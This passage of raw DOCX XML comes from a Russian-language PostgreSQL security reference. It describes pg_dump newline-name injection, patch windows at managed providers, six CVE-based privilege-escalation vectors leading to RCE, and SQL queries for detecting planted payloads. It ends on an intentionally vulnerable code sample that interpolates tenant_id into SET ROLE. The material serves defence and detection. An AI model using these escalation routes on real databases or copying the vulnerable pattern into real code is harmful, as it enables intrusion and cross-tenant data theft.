          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. До патча 17.6/16.10/15.14/14.19/13.22 — уязвимы. Custom RDS-snapshots через native pg_dump — патчат локальный psql + RDS-target.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Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: аналогично через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gcloud sql export sql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gcloud sql import sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Auto-update в maintenance windows; до окна — уязвимы.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Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: использует pg_dump для backup-export. Auto-update — patch обычно в течение недели после release. Поверхность атаки активна короткое окно.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Render / Heroku / Neon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: pg_dump-restore pipeline у каждого провайдера свой; необходимо проверять конкретный flow и version psql/libpq на host, который запускает restore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup для R25 (создание объекта с newline-в-имени)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на managed: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RDS / Cloud SQL: application-роль обычно имеет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собственной user-schema, что достаточно для CREATE TABLE с opasnym именем. CREATE ROLE — обычно не доступен application (требует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Supabase: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">anon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authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> роли имеют ограниченный CREATE; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">service_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет полный доступ — если её ключ компрометирован, setup тривиален.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Activation для R25</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Backup-restore — обычно DBA-операция на admin-machine; уязвима, если psql-version-on-host старый.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CI-pipelines для test-database-seeding часто используют pg_dump-restore — точка активации, если payload в production proliferates до test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полная таблица провайдеров и patch-окон для R25 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9</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Для самостоятельной проверки текущего кластера:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Все версии установленных компонентов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW server_version;  -- сервер</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- psql --version  -- на host (через shell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- objects с newline-в-имени:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolname FROM pg_authid WHERE rolname ~ E'[\n\r]';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT relname, n.nspname FROM pg_class c JOIN pg_namespace n ON c.relnamespace=n.oid WHERE relname ~ E'[\n\r]';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT description FROM pg_description WHERE description ~ E'[\n\r]\\\\!';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если какой-либо из этих query возвращает строки на production-кластере — немедленный alert; объект-с-payload уже создан.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege escalation в PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — класс паттернов, позволяющих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">роли с ограниченными правами получить права более привилегированной роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (как правило — superuser). Это не финальные RCE: эскалация — ступень, после которой становятся доступны категории 3.7 (RCE через COPY PROGRAM, untrusted languages), 3.6.4 (file r/w через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3.17 (RLS bypass). Без 3.13 эти векторы недоступны для типичной application-роли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шесть подразделов 3.13 — это шесть разных механик «подъёма». Пять из них якорятся на конкретные CVE (R8 / R12 / R15 / R16 / частично R28), один (3.13.6) описывает классическую mis-configuration без CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mini-таблица: шесть путей эскалации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Вектор</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 ДО</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Получаемая привилегия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Финальный RCE в 3.7.X</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 plan-cache (CVE-2024-10978)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SET ROLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на хотя бы одну другую роль</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Чтение/запись данных под чужой ролью; обход RLS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(если целевая роль имеет </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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schema_element в CREATE SCHEMA (CVE-2023-2454)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БД (или PUBLIC до PG 15)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Исполнение функции от admin при обращении к созданной таблице</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3.7.2a / 3.7.3 (если admin = superuser)</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Index expressions + autovacuum (CVE-2022-1552)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схеме</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Arbitrary SQL как роль, запустившая ANALYZE (autovacuum → superuser)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3.7.2a / 3.7.3</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Extension scripts pre-create (CVE-2022-2625)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схеме (public до PG 15)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как superuser в момент вызова перехваченной функции</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3.7.2a / 3.7.3</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Trusted extensions chain (R28)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БД (PG 13+)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Установка trusted extension → chain в (а) CVE-2024-10979 (3.7.2b) или (б) R16-style (3.13.4)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 (chain a) / 3.7.X (chain b)</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SECURITY DEFINER без SET search_path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pg_temp (всегда у каждой сессии)</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Arbitrary SQL как owner SECURITY DEFINER функции (обычно superuser)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3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — куда эскалируют все шесть векторов 3.13. Каждый подраздел 3.13.X указывает, какой именно вектор 3.7.X становится доступен после эскалации. Граница: 3.13 даёт право; 3.7 им пользуется.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 (RLS-обходы)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.13.1 (SET ROLE / CVE-2024-10978) пересекается с 3.17.3, где тот же CVE рассматривается с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обхода RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (а не получения роли). Граница: 3.13.1 — получение чужой роли; 3.17.3 — чтение чужих данных через тот же баг.</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 / 3.6.4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 это predefined roles, которые часто эскалируются через 3.13.X. Граница: 3.6.3/3.6.4 — что делать с привилегией; 3.13 — как её получить.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(Mitigations / Принцип наименьших привилегий)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — раздел 5 содержит сводные рекомендации по предотвращению 3.13 на уровне ролей и GRANT-схем; здесь — только специфичные mitigations внутри каждой карточки.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SET ROLE / SET SESSION AUTHORIZATION — CVE-2024-10978, multi-tenant plan-cache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3.13.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> search_path hijacking + schema_element — CVE-2023-2454, DEFAULT-bypass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3.13.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Index expressions + autovacuum/REINDEX — CVE-2022-1552, expression-trap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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extension scripts: CREATE OR REPLACE подмена — CVE-2022-2625, ownership-takeover (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 9.8</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3.13.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted extensions как ступень эскалации — R28, два chain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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SECURITY DEFINER + SET search_path — классический mis-configuration без CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все шесть векторов работают по одной из трёх схем:</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Bug в reset/setup пути</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.13.1) — баг сервера, который позволяет данным/коду одной роли просочиться в контекст другой.</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Trap-объект, исполняемый позже под чужой ролью</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.13.2, 3.13.3, 3.13.4, 3.13.6) — атакующий заранее создаёт объект (DEFAULT-выражение, index expression, функцию в pg_catalog, функцию в pg_temp), который затем триггерится действием более привилегированной роли (admin-запрос, autovacuum, CREATE EXTENSION, вызов SECURITY DEFINER).</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Chain через дополнительный CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.13.5) — non-superuser устанавливает trusted extension, дальше эксплуатирует уже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">другой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE в этом расширении или в его scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Различие между 1 и 2/3 важно для детекции: схема 1 невидима в коде атакующего (только в seq последовательности запросов); схемы 2 и 3 оставляют артефакты в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 это материал для статической детекции в rules.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.1 SET ROLE / SET SESSION AUTHORIZATION (CVE-2024-10978)</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До PostgreSQL 17.1 (и параллельных minor-фиксов)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имели ошибку в reset-логике: при определённых sequence событий (исключение внутри SECURITY DEFINER функции, повторный SET с RESET, нестандартное abort/rollback) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">current role не возвращалась к ожидаемому значению</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и следующий запрос в той же сессии исполнялся под предыдущей или неверной ролью. Для multi-tenant приложений, использующих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per-request для разграничения tenant-ов, это означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">утечку чужих данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> между запросами разных tenant-ов, share-ящих одно соединение из pool.</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app/api/v1/accounts.py — типичный multi-tenant API</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get_pooled_session  # connection pool</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@router.get("/accounts")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_accounts(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: str,  # из JWT-claim</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Depends(get_pooled_session),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переключение в роль tenant_X для применения RLS</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session.execute(text(f"SET ROLE tenant_{tenant_id}"))</w:t>
      </w:r>
    </w:p>
    <w:p>
